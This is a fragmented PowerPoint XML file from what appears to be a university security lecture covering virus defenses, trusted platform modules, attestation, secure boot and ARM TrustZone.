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8"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId79"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="307" r:id="rId3"/>
    <p:sldId id="293" r:id="rId4"/>
    <p:sldId id="294" r:id="rId5"/>
    <p:sldId id="296" r:id="rId6"/>
    <p:sldId id="297" r:id="rId7"/>
    <p:sldId id="298" r:id="rId8"/>
    <p:sldId id="299" r:id="rId9"/>
    <p:sldId id="300" r:id="rId10"/>
    <p:sldId id="302" r:id="rId11"/>
    <p:sldId id="303" r:id="rId12"/>
    <p:sldId id="304" r:id="rId13"/>
    <p:sldId id="305" r:id="rId14"/>
    <p:sldId id="306"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334" r:id="rId33"/>
    <p:sldId id="335" r:id="rId34"/>
    <p:sldId id="336" r:id="rId35"/>
    <p:sldId id="337" r:id="rId36"/>
    <p:sldId id="338" r:id="rId37"/>
    <p:sldId id="339" r:id="rId38"/>
    <p:sldId id="340" r:id="rId39"/>
    <p:sldId id="341" r:id="rId40"/>
    <p:sldId id="342" r:id="rId41"/>
    <p:sldId id="343" r:id="rId42"/>
    <p:sldId id="344" r:id="rId43"/>
    <p:sldId id="345" r:id="rId44"/>
    <p:sldId id="346" r:id="rId45"/>
    <p:sldId id="347" r:id="rId46"/>
    <p:sldId id="348" r:id="rId47"/>
    <p:sldId id="349" r:id="rId48"/>
    <p:sldId id="308" r:id="rId49"/>
    <p:sldId id="271" r:id="rId50"/>
    <p:sldId id="272" r:id="rId51"/>
    <p:sldId id="275" r:id="rId52"/>
    <p:sldId id="277" r:id="rId53"/>
    <p:sldId id="278" r:id="rId54"/>
    <p:sldId id="258" r:id="rId55"/>
    <p:sldId id="279" r:id="rId56"/>
    <p:sldId id="261" r:id="rId57"/>
    <p:sldId id="262" r:id="rId58"/>
    <p:sldId id="263" r:id="rId59"/>
    <p:sldId id="269" r:id="rId60"/>
    <p:sldId id="280" r:id="rId61"/>
    <p:sldId id="290" r:id="rId62"/>
    <p:sldId id="289" r:id="rId63"/>
    <p:sldId id="264" r:id="rId64"/>
    <p:sldId id="268" r:id="rId65"/>
    <p:sldId id="265" r:id="rId66"/>
    <p:sldId id="285" r:id="rId67"/>
    <p:sldId id="266" r:id="rId68"/>
    <p:sldId id="282" r:id="rId69"/>
    <p:sldId id="267" r:id="rId70"/>
    <p:sldId id="310" r:id="rId71"/>
    <p:sldId id="288" r:id="rId72"/>
    <p:sldId id="316" r:id="rId73"/>
    <p:sldId id="311" r:id="rId74"/>
    <p:sldId id="315" r:id="rId75"/>
    <p:sldId id="313" r:id="rId76"/>
    <p:sldId id="314" r:id="rId7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DC47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0500" autoAdjust="0"/>
    <p:restoredTop sz="90834" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="104" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="-1824" y="-78"/>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9156"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="-2368"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933265-5E23-BF49-B6BF-1934B9BC786E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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D7F38-D411-9B47-AFF4-70C571B83B5A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2702927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A1BC7-CCFC-484A-97F3-979F740C57F6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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7FDFF-7B9F-7D4D-BFC0-AAD1F3D3D3CB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62987357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WW2 Enigma for an example…)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</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64931" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Scheme should be psychologically acceptable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>30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defTabSz="864931" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use polymorphic code (more later) to hide even this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>38</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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Integrity checkers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Behavioral checkers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Virus avoidance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>good OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>install only shrink-wrapped software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>use antivirus software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>do not click on attachments to email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>frequent backups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Recovery from virus attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>halt computer, reboot from safe disk, run antivirus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>40</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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Solutions to have best of both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Trusted Virtual Machine Monitor (T-VMM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>attestation through virtual device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Change existing hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>attestation done by hardware module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>add secure execution mode to CPU</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51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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Third-party (grid) computing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Produce correct results</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52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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Transmeta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" i="1" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> Crusoe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" i="1" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Via C3 Padlock (RNG)</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53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342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Changes to platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HW: Trusted Platform Module (TPM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SW: BIOS + OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF97FDFF-7B9F-7D4D-BFC0-AAD1F3D3D3CB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</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TPM is basically a secure micro-controller with added cryptographic functionalities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>RSA Accelerator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SHA-1 hash algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Random Number Generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Limited NVRAM for TPM Contents</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55</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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Two methods of booting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Secure Boot: boot can be halted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Authenticated Boot: just reporting</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60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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Attestation must result in a shared secret between the application and remote party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Each layer of the platform is checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hardware attests what OS is booted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>OS attests what application it requires a key for and will only allow the use of that key by that given application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A platform is only as trusted as the tamper resistance of hardware and level of assurance of its trusted OS</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61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Same key is used to encrypt &amp; decrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keys used to be difficult to guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Needed to try 255 different keys, on average</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04982B31-5F2E-4241-814E-088E6ECAA300}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</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Integrity Measurement Architecture (IMA) [3]</a:t>
            </a:r>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62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Data bound to a particular platform is only accessible by that platform. If this data migrates to a different platform, the data cannot be accessed.</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65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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>proving knowledge of SK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</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66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AIKs are created using Certificates (also called Credentials) available within the TPM. AIKs do not have any direct association with the EK or the credentials. AIKs are always bound to the platform and can be used to provide attestation to the platform’s identification and configuration</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Service provider (or challenger) trusts the Trusted Third Party (TTP) to do its due diligence before issuing AIKs to a platform.</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67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Normal world cannot access page translation table of secure world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> secure world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Looks like hardware to the normal world</a:t>
            </a:r>
          </a:p>
          <a:p>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On-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> and off-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> hardware reacts to processor security state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Hardware enforced isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Full JTAG debug with no information leakage between two worlds</a:t>
            </a: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71</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2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Small fixed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Introduce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> an NS-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>use this bit to identify secure data throughout system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Monitor </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>manages the NS-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>manages transition in &amp; out of security mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRP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72</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73</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dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
